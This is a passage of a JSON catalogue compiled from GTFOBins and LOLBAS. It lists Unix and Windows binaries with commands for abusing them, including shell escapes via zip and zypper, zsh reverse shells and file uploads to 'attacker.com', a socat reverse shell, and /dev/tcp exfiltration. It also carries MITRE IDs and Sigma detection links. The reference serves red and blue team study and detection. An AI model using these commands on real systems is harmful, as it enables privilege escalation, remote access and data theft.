created.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zic:command:0:unprivileged","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zip:file-read:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:file-read:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:file-read:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zless:inherit:0:sudo","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zless:inherit:0:suid","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zless:inherit:0:unprivileged","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zsh:download:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:download:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:download:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-write:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:inherit:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:reverse-shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:upload:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsoelim:file-read:0:sudo","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zsoelim:file-read:0:suid","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zsoelim:file-read:0:unprivileged","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsoelim/"]},{"id":"gtfo:zypper:shell:0:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:0:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:1:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"gtfo:zypper:shell:1:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"]},{"id":"lolbas:addinutil-exe:0","toolId":"lolbas:addinutil-exe","toolName":"AddinUtil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe -AddinRoot:.","description":"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.","usecase":"Proxy execution of malicious serialized payload","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml"}],"references":["https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html","https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"]},{"id":"lolbas:appinstaller-exe:0","toolId":"lolbas:appinstaller-exe","toolName":"AppInstaller.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source={REMOTEURL:.exe}","description":"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"}],"references":["https://twitter.com/notwhickey/status/1333900137232523264","https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"]},{"id":"lolbas:applaunch-exe:0","toolId":"lolbas:applaunch-exe","toolName":"Applaunch.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe\" /activate \"{REMOTEURL}#APPLICATION_METADATA_HERE\"","description":"Launches a ClickOnce application via `Applaunch.exe`. Bypasses SmartScreen and default AppLocker rules when the application is published as partial trust.","usecase":"Execute ClickOnce applications in environments where `dfsvc.exe` would normally enforce full-trust and SmartScreen checks. Can be abused as an AWL bypass in rare configurations.","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Applaunch.exe rarely executes unless any ClickOnce partial trusted apps are used. Any use or invocation outside dfsvc.exe with `/activate` should be considered suspicious."}],"references":["https://nathan2.com/posts/clicktools","https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment","https://web.archive.org/web/20060913192623/http://blogs.msdn.com/shawnfa/archive/2005/11/30/498610.aspx","https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"]},{"id":"lolbas:aspnet-compiler-exe:0","toolId":"lolbas:aspnet-compiler-exe","toolName":"Aspnet_Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u","description":"Execute C# code with the Build Provider and proper folder structure in place.","usecase":"Execute proxied payload with Microsoft signed binary to bypass application control solutions","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml"}],"references":["https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/","https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8","https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"]},{"id":"lolbas:at-exe:0","toolId":"lolbas:at-exe","toolName":"At.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\System32\\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}","description":"Create a recurring task to execute every day at a specific time.","usecase":"Create a recurring task, to eg. to keep reverse shell session(s) alive","mitre":["T1053.002"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml"},{"type":"IOC","value":"C:\\Windows\\System32\\Tasks\\At1 (substitute 1 with subsequent number of at job)"},{"type":"IOC","value":"C:\\Windows\\Tasks\\At1.job"},{"type":"IOC","value":"Registry Key - Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1."}],"references":["https://freddiebarrsmith.com/at.txt","https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html","https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems","https://lolbas-project.github.io/lolbas/Binaries/At/"]},{"id":"lolbas:atbroker-exe:0","toolId":"lolbas:atbroker-exe","toolName":"Atbroker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ATBroker.exe /start malware","description":"Start a registered Assistive Technology (AT).","usecase":"Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"},{"type":"IOC","value":"Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration"},{"type":"IOC","value":"Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"},{"type":"IOC","value":"Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware"}],"references":["http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/","https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"]},{"id":"lolbas:bash-exe:0","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:1","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane\"","description":"Executes a reverse shell","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:2","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'","description":"Exfiltrate data","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"]},{"id":"lolbas:bash-exe:3","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used to bypass Application 